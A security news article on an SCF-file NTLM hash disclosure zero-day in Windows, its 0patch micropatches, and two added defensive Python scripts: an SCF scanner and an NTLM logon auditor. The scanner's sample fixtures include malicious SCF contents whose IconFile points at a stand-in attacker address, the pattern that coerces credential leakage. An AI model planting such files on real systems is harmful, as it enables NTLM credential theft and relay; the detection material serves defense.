
New Windows Zero-Day Flaw Lets Remote Attackers Steal NTLM Credentials — Unofficial Fix Now Available


A newly discovered zero-day vulnerability in Windows allows attackers to remotely harvest NTLM authentication hashes simply by tricking users into viewing malicious files in Windows Explorer.

Security firm ACROS Security has released free unofficial micropatches via its 0patch service to mitigate the flaw until Microsoft issues an official fix.

Vulnerability Details and Exploitation

Dubbed the SCF File NTLM Hash Disclosure Vulnerability, the flaw affects all Windows versions from Windows 7 and Server 2008 R2 to the latest Windows 11 v24H2 and Server 2025.

Attackers can craft a malicious Shell Command File (SCF) that forces a victim's system to authenticate to an attacker-controlled server as soon as the file is displayed in Explorer, even if the user never opens it.

This could occur via shared folders, USB drives, or files auto-downloaded to the Downloads folder.

What the attacker captures is the NTLM challenge-response (Net-NTLMv2 in most current environments) rather than the user's NT hash itself. That response can be relayed to other services that accept NTLM (an NTLM relay attack) or cracked offline to recover the password; either way the attacker can then impersonate the user against sensitive systems. A classic pass-the-hash attack needs the raw NT hash, which this leak does not yield on its own.
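The article withholds the exploit details, but the mechanism it describes (Explorer contacting a remote server while merely rendering the file) is driven by the SCF file's icon path, and that gives defenders something concrete to hunt for. The scanner below is an added example, not code from the article or from ACROS/0patch: it parses SCF files INI-style, extracts the IconFile entry from the [Shell] section, and flags any whose icon path is a UNC reference (\\host\share\...) to a host outside an allow-list, which is exactly the shape of file that would make Explorer authenticate elsewhere. The sample file contents, the 10.0.0.99 "attacker" address and the fileserver01.corp.example trusted host are all constructed for the example.

```python
import os
import re

# Constructed sample SCF contents for a stand-alone run (not files from the article).
# 10.0.0.99 stands in for an attacker-controlled host; fileserver01.corp.example is a
# hypothetical internal server that is allowed to serve icons.
SAMPLES = {
    "desktop.scf": (
        "[Shell]\r\nCommand=2\r\n"
        "IconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "invoice.scf": (
        "[Shell]\r\nCommand=2\r\n"
        "IconFile=\\\\10.0.0.99\\share\\icon.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "report.scf": "[shell]\r\niconfile = \\\\fileserver01.corp.example\\icons\\x.ico\r\n",
    "webdav.scf": "[Shell]\r\nIconFile=\\\\10.0.0.99@80\\dav\\i.ico\r\n",
    "notes.txt": "not an scf\r\n",
}

# Hosts whose shares may legitimately serve icons (assumption for this example).
TRUSTED_HOSTS = {"fileserver01.corp.example"}

# \\host\share\... ; the forward-slash form Explorer also tolerates is accepted too.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")


def parse_icon_file(text):
    """Return the IconFile value from the [Shell] section (case-insensitive), or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "shell" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "iconfile":
                return value.strip()
    return None


def unc_host(path):
    """Host part of a UNC icon path, or None for local/relative paths.

    A trailing @port (\\\\host@80\\...) is the WebDAV redirector syntax; it is
    stripped so the host is compared on its own.
    """
    m = UNC_RE.match(path)
    if not m:
        return None
    return m.group(1).split("@")[0].lower()


def classify(name, text, trusted=TRUSTED_HOSTS):
    """One of: skip (not .scf), no-icon, local-icon, unc-trusted, unc-untrusted."""
    if not name.lower().endswith(".scf"):
        return "skip"
    icon = parse_icon_file(text)
    if icon is None:
        return "no-icon"
    host = unc_host(icon)
    if host is None:
        return "local-icon"
    return "unc-trusted" if host in trusted else "unc-untrusted"


def scan_samples(samples=SAMPLES, trusted=TRUSTED_HOSTS):
    """Return {filename: verdict} for an in-memory set of files."""
    return {name: classify(name, text, trusted) for name, text in samples.items()}


def scan_tree(root, trusted=TRUSTED_HOSTS):
    """Walk a real directory (a share or a Downloads folder) and return untrusted UNC hits."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read(64 * 1024)
            except OSError:
                continue
            if classify(fn, text, trusted) == "unc-untrusted":
                hits.append((path, parse_icon_file(text)))
    return hits


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:14} {verdict}")
```

Run scan_tree against the locations the article names (shared folders, removable media, Downloads) from a host that cannot itself be coerced into authenticating, since opening the files in Explorer on a vulnerable machine is what triggers the leak. The allow-list matters: icon paths on internal file servers are common and legitimate, so the check is "UNC to an unexpected host", not "any UNC".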

While Microsoft has deprecated NTLM in favor of Kerberos, the protocol remains widely used, particularly in hybrid environments with legacy systems.

Unofficial Micropatches and Mitigation

0patch’s micropatches address the vulnerability by modifying how Windows handles SCF file icon paths.

The patches apply automatically to registered systems without requiring reboots and will remain free until Microsoft releases an official update.

Affected systems include:

  • Legacy Windows versions (e.g., Windows 7, Server 2008 R2) no longer receiving Microsoft updates.
  • Modern Windows versions (e.g., Windows 11 v24H2, Server 2025) still under support.

The micropatches join 0patch's growing library of fixes for unpatched Windows flaws, including the EventLogCrasher vulnerability (which disables event logging across a domain) and three NTLM relay issues Microsoft has classed as "won't fix": PetitPotam, PrinterBug, and DFSCoerce.

This marks the fourth zero-day 0patch has reported to Microsoft since late 2024; the earlier three were:

  • CVE-2025-21308: A Windows Theme file NTLM leak, patched in January 2025.
  • CVE-2025-21377: A URL file NTLM leak, fixed in February 2025.
  • A Mark of the Web bypass on Server 2012, still unpatched.

Despite Microsoft’s progress in retiring NTLM, these vulnerabilities highlight persistent risks in environments using legacy authentication.

0patch reports that 40% of its users rely on the service specifically to mitigate such unpatched or ignored flaws.


Organizations are advised to:

  1. Apply 0patch micropatches immediately on affected systems, whether or not they are still supported by Microsoft, since no official fix exists yet.
  2. Audit internal NTLM usage and transition to Kerberos where possible.
  3. Monitor for Microsoft’s official patch, expected in future Windows updates.
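Step 2 is the one that takes real work: before NTLM can be restricted, you need to know who still uses it and from where. The script below is an added example, not part of the article or of 0patch's tooling. It reads Security log events in the XML form wevtutil exports (one <Event> element per line), keeps the successful logons (event 4624) whose AuthenticationPackageName is NTLM, groups them by source address and account, and separately lists any that negotiated NTLMv1, the first thing to eliminate. The sample events, account names and addresses are constructed; a real export would come from a file server or domain controller.

```python
import xml.etree.ElementTree as ET
from collections import Counter

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"


def _event(eid, **data):
    """Build one Security event in the XML shape wevtutil exports (constructed sample data)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>{eid}</EventID></System>'
            f"<EventData>{fields}</EventData></Event>")


# Constructed sample: two NTLMv2 logons by alice, one NTLMv1 logon by a service account
# from a legacy host, one Kerberos logon, and one failed logon (4625) that must be ignored.
SAMPLE_EVENTS = [
    _event(4624, TargetUserName="alice", TargetDomainName="CORP", LogonType="3",
           AuthenticationPackageName="NTLM", LmPackageName="NTLM V2",
           IpAddress="10.0.0.5", WorkstationName="WS01"),
    _event(4624, TargetUserName="alice", TargetDomainName="CORP", LogonType="3",
           AuthenticationPackageName="NTLM", LmPackageName="NTLM V2",
           IpAddress="10.0.0.5", WorkstationName="WS01"),
    _event(4624, TargetUserName="svc_backup", TargetDomainName="CORP", LogonType="3",
           AuthenticationPackageName="NTLM", LmPackageName="NTLM V1",
           IpAddress="10.0.0.42", WorkstationName="LEGACY01"),
    _event(4624, TargetUserName="bob", TargetDomainName="CORP", LogonType="3",
           AuthenticationPackageName="Kerberos", LmPackageName="-",
           IpAddress="10.0.0.7", WorkstationName="WS02"),
    _event(4625, TargetUserName="carol", TargetDomainName="CORP", LogonType="3",
           AuthenticationPackageName="NTLM", LmPackageName="-",
           IpAddress="10.0.0.9", WorkstationName="WS03"),
]


def parse_event(xml_text):
    """Return (event_id, {Data Name: value}) for one exported event."""
    root = ET.fromstring(xml_text)
    event_id = root.findtext(f"{NS}System/{NS}EventID")
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{NS}Data")}
    return event_id, data


def ntlm_logons(events):
    """Successful logons (4624) that used the NTLM authentication package."""
    out = []
    for xml_text in events:
        eid, d = parse_event(xml_text)
        if eid != "4624" or d.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue
        out.append({
            "user": d.get("TargetDomainName", "") + "\\" + d.get("TargetUserName", ""),
            "source": d.get("IpAddress", "") or d.get("WorkstationName", ""),
            "workstation": d.get("WorkstationName", ""),
            "logon_type": d.get("LogonType", ""),
            "ntlm_version": d.get("LmPackageName", ""),
        })
    return out


def summarize(records):
    """Count NTLM logons per (source, user) and list the NTLMv1 ones separately."""
    by_pair = Counter((r["source"], r["user"]) for r in records)
    v1 = [r for r in records if r["ntlm_version"].upper() == "NTLM V1"]
    return by_pair, v1


def load_wevtutil_export(path):
    """Read the output of: wevtutil qe Security /q:"*[System[EventID=4624]]" /f:xml"""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return [line.strip() for line in fh if line.strip().startswith("<Event")]


if __name__ == "__main__":
    by_pair, v1 = summarize(ntlm_logons(SAMPLE_EVENTS))
    for (source, user), n in by_pair.most_common():
        print(f"{n:4}  {source:15}  {user}")
    for r in v1:
        print(f"NTLMv1 from {r['source']} ({r['workstation']}) as {r['user']}")
```

4624 events are written on the machine that accepted the logon, so the export has to come from the servers that actually receive NTLM authentication (file servers, domain controllers), not from client workstations. Once the list of (source, user) pairs is short enough to reason about, each one is a candidate for a Kerberos SPN fix, an application update, or a block via the "Restrict NTLM" group policies.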

ACROS Security has withheld technical details to prevent exploitation, but confirms that the attack methodology mirrors that of the earlier NTLM hash leaks via URL files.

Microsoft has not yet provided a timeline for an official fix.
